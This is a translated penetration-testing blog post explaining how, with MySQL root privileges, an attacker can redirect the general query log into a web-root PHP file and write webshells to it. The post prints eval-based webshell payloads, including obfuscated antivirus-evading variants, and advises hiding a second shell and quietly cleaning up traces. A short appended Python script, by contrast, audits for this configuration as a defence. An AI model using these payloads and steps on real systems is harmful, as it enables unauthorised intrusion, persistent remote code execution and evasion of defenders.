0x01 Preface:
During a real penetration test you are likely to run into the following situation: you clearly hold MySQL root privileges, yet when you try to write a shell with INTO OUTFILE nothing works, even though you have confirmed that you have write permission on the target website directory and that the MySQL root user has not been de-privileged. Usually this is because INTO OUTFILE has been disabled or a WAF is blocking it. I hope the methods below can help you.
0x02 Getting a shell:
The principle of writing a shell through the MySQL log file is very simple: once the general log is turned on, every SQL statement executed is automatically recorded in the log file, so our shell code gets written there automatically as well. Operations staff usually use the general log to troubleshoot slow queries and only enable it temporarily, so if we want to use it we have to turn it on by hand. That is why root privileges are needed: it involves changing MySQL parameters. This is really just basic MySQL knowledge, as the following makes clear:
First, check where the current MySQL default log is located: 'C:\ProgramData\MySQL\MySQL Server 5.5\Data\2008R2DC.log'
While you are at it, note down the original, normal log path so that it can be restored once the work is done.
mysql> show variables like '%general%';
By default the general log is basically off; otherwise the volume of insert/delete/update/select records could be enormous.
mysql> set global general_log = on;
Now point the log file location at the physical path of the target website:
mysql> set global general_log_file = 'C:/Program Files (x86)/Apache Software Foundation/Apache2.2/htdocs/abouts.php';
Start writing the shell. This one is a plain shell with no AV evasion; if there is a WAF, use one of the evading shells below.
mysql> select '<?php eval($_POST[request]);?>';
mysql> select "<?php $sl = create_function('', @$_REQUEST['klion']);$sl();?>";
AV-evading shell, eval style.
mysql> SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_= 'a'.$_.'rt';$_(base64_decode($_REQUEST['klion']));?>";
Someone else's AV-evading shell, assert & base64_encode style.
0x03 Cleaning up afterwards
Finally, once the work is done, be sure to restore the configuration to its original state, then quietly leave.
[Otherwise, if the target site gets a lot of traffic, the log file may balloon instantly and connecting to the shell will be extremely sluggish]
Once you have the shell, immediately upload another one [put it somewhere hidden; for details on hiding webshells, see the related posts on this blog]
Then delete the original shell through the new one. Being a little careful at least keeps your shell from being lost so quickly.
mysql> set global general_log_file = 'C:\ProgramData\MySQL\MySQL Server 5.5\Data\2008R2DC.log';
mysql> set global general_log = off;
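As an added example (not part of the original post), the defender-side counterpart of the configuration steps above: a Python audit that flags a general_log setup whose log file has been pointed into a web root or at a web-executable file, and scans general-log lines for PHP open tags. The variable values, web root and log lines are constructed samples modelled on the paths quoted in this post.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample of `SHOW VARIABLES LIKE '%general%'` output on a host
# where the log has been redirected into the web root (values are made up).
SAMPLE_VARIABLES = {
    "general_log": "ON",
    "general_log_file": "C:/Program Files (x86)/Apache Software Foundation/Apache2.2/htdocs/abouts.php",
}

# Constructed general-log lines: one benign query and one that embeds PHP.
SAMPLE_LOG_LINES = [
    "180101 10:00:01\t    3 Query\tshow variables like '%general%'",
    "180101 10:00:05\t    3 Query\tselect '<?php eval($_POST[request]);?>'",
]

WEB_EXTENSIONS = {".php", ".phtml", ".asp", ".aspx", ".jsp"}
PHP_TAG = re.compile(r"<\?(php|=)", re.IGNORECASE)


def _normalise(path):
    # Windows paths compare case-insensitively; unify separators as well.
    return PureWindowsPath(path).as_posix().lower()


def audit_general_log(variables, web_roots):
    """Return a list of findings about the general_log configuration."""
    findings = []
    log_file = variables.get("general_log_file", "")
    if variables.get("general_log", "OFF").upper() == "ON":
        findings.append("general_log is ON (should be off outside troubleshooting)")
    norm = _normalise(log_file)
    for root in web_roots:
        if norm.startswith(_normalise(root).rstrip("/") + "/"):
            findings.append(f"general_log_file is inside web root {root}")
    if PureWindowsPath(log_file).suffix.lower() in WEB_EXTENSIONS:
        findings.append(f"general_log_file has a web-executable extension: {log_file}")
    return findings


def find_php_in_log(lines):
    """Return (index, line) pairs whose logged query contains a PHP open tag."""
    return [(i, ln) for i, ln in enumerate(lines) if PHP_TAG.search(ln)]


if __name__ == "__main__":
    for f in audit_general_log(SAMPLE_VARIABLES, ["C:/Program Files (x86)/Apache Software Foundation/Apache2.2/htdocs"]):
        print("FINDING:", f)
    for i, ln in find_php_in_log(SAMPLE_LOG_LINES):
        print(f"PHP tag in log line {i}: {ln}")
```

A clean host yields an empty findings list and no matching log lines; a periodic run of these two checks against the live variables and the current general log catches the redirection regardless of which shell text is used.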
0x04 Closing words
This is not a particularly novel trick; it is all about digging into and using some basic features of MySQL itself. Genuinely understanding them is what matters. The process may not go smoothly, and recording how you solved the problems along the way is where the real gain lies. Good luck.
0x05 Two necessary conditions for successful use
You must first find a way to obtain the physical path of the target site; otherwise, where would you point the log?
The only place we can reach from outside and execute a webshell is the target's website directory.
The user the database service runs as must be able to write to the website directory pointed to above; otherwise the log file simply cannot be created.
Honestly, not many targets satisfy both of these conditions at once.
If the target site handles errors well and the privileges of the web-server user and the database user are cleanly separated, it is very hard to pull off. It is admittedly of limited use, but it is still a good idea and well worth extending.
This sort of thing is probably better suited to integrated environments such as AppServ, XAMPP, ...
because all permissions are mapped onto the same system user, and on Windows that user usually has high privileges [in fact, most often it is SYSTEM directly].
You are welcome to follow the blog's official account or scan the code directly. Content is centred on my personal WeChat public account "APT attack and defense guide", where posts usually appear first and are then updated and pushed to other platforms. I always look forward to learning from and exchanging with more like-minded friends.